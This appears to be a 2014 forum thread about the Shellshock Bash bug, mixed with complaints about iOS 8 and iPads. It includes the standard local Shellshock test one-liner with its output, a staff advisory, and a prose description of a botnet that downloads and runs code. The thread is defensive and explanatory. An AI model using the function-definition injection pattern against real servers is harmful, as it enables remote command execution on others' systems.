Linux/Apple mac bug

[pre65]

http://www.bbc.co.uk/news/technology-29361794

[Cressy Snr]

http://www.bbc.co.uk/news/technology-29361794

Last login: Wed Sep 24 20:26:38 on console
xxxxxxxxxxxMacMini:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
xxxxxxxxxxxxxMacMini:~ steve$
xxxxxxxxxxxxxMacMini:~ steve$

(My xs)

Oh dear

Oh well, nothing to be done except wait for the Apple security update.

No web services are running on my Mac (I hope)

[jack]

"in the trade" we've been looking at this (aka. "ShellShock") for a few days now - all versions of Bash up to current are affected - there is no escape.

Luckily, our production sites are not exposed, but its going to cause a world of pain out there.

The main problem is that its far easier than HeartBleed to exploit, and also far far more flexible - HeartBleed "only" allowed you to trawl through the in-memory data of the target server and maybe you'd find some usernames and unencrypted passwords or session/private RSA keys.

The problem with ShellShock is that you can do pretty much anything you want on the target server. It's a free pass to mayhem.

Ho, hum...

[pre65]

Steve, I hope your Apple update is less painful than the recent I phone fiasco.

[Cressy Snr]

Steve, I hope your Apple update is less painful than the recent I phone fiasco.

I don't own an iPhone; will never own an iPhone.
I very reluctantly own a mobile phone, but nobody rings me, I because I never give out my number.
I don't want to be contactable.
Cellphones....worst bloody thing ever to be invented.
Some stupid cow walked straight into me this morning whilst I was walking the dog. She was texting of course, not looking where she was going and the kid she had in tow was playing a game on a tablet and he wasn't looking where he was going either.
I couldn't give a fook about iPhones

[jack]

This is what I sent to all our staff yesterday:

Introduction

Many of you will have read about this in the press. For those that haven’t, the simple summary is that the Bash shell that is used to execute CGI requests on most of the world’s web servers has had a huge and easily-exploitable hole in it for 20 years. As everyone uses the same version of the Unix toolchain, everyone uses the same “Bash” and thus all Unix-based are equally vulnerable.

Its rated as being far worse in real terms than the “HeatBleed” SSL issue, in that rather than “just” being able to trawl the memory space of the remote web server for username/password combos or private RSA keys, you can basically do what you like - you can execute arbitrary command in the context of the remote shell – it’s really easy/trivial to exploit this bug – examples in the link below.

RedHat have probably the most concise description of this issue – see https://securityblog.redhat.com/2014/09 ... on-attack/

Note that the fix that was originally posted was incomplete – a new fix is yet to be delivered.

How does this affect me?

Possibly a lot, in that sites that you access and which have your data stored on them may well be completely open to attack. If you run your own web sites (nearly all run some variant of Linux), you should replace your Bash as soon as an approved fix is available.

However, there is nothing you, as a client browser, can do to lessen your chances of being indirectly affected by such an attack – its server-side only and therefore up to each Unix-based website that used Bash-based CGI scripting to implement the fixes ASAP, or to simply disable Bash CGI until the fix is made.

Nick

EDIT: This is being actively used in the wild already - a botnet was discovered within hours of the announcement - cunningly, it uses wget or curl to download the botnet precursor, does a chmod 777, then executes the downloaded code to subvert the host and add it to the botnet.

[Dave the bass]

... cunningly, it uses wget or curl do download the botnet precursor, does a chmod 777, ten executes the downloaded code to subvert the host and add it to the botnet.

I thought it might.

[The Stratmangler]

My son's school pushed through an iPad scheme for teaching in the classroom.
They even managed to get the support of the majority of parents, who actually pay a not inconsiderable amount of money towards the scheme.

I refused to participate.
The business world doesn't generally use Apple product, so there's little software wise to help my son.
There is plenty of IT equipment and software here at home for him to produce work for school.

With this iOS8 update fiasco there are huge numbers of iPads now not doing what they're supposed to be doing.
Huge amounts of stored files containing the work of students have disappeared because they were stored on the iPads.

I'm not laughing, because it isn't funny, but my son has been relieved of the stress of having large amounts of his work lost, which is something I am grateful for.
My son's work is largely on paper.

I wonder how longs it's going to be before the school drops the iPad as a teaching tool?

[shane]

One of the less well noted effects of IoS8 is that, if two devices are registered using the same Apple ID, a phonecall to one can make either or both of them ring. One customer with two iP6s and two iP5s found that all incoming calls made all four ring. One of my colleagues was bemused to discover that all calls coming into his iPhone were being diverted to his iPad. It's quite difficult to answer an iPad when it rings...

[Andrew]

My Fedora box was patched this morning, the hack's 'proof of concept' shown by Steve (and widely available elsewhere) now seems to be caught correctly and I get "ignoring function definition attempt" and "error importing function definition for 'xxxx'".

Someone asked me if the Linksys router family is vulnerable, as you may know many of these boxes run a variant of Linux and so the question is very pertinent.

Thankfully, as far as I understand it, most routers use a cut down version of a shell named 'ash' which is part of busybox and I can't seem to make mine do anything worrying with spurious function definitions when I get a shell up via remote login.

If you are concerned, it might be worthwhile checking your own router/NAS etc (many run Linux) if you can and know how, especially if it can be accessed, like a router could, from the wider Internet.

Andrew

[jack]

If you are concerned, it might be worthwhile checking your own router/NAS etc (many run Linux) if you can and know how, especially if it can be accessed, like a router could, from the wider Internet.

"ash" and "bash" are not related - they have different origins and different authors - systems based on "ash" should be safe (from this bug, at least!).

[Neal]

OSX update released....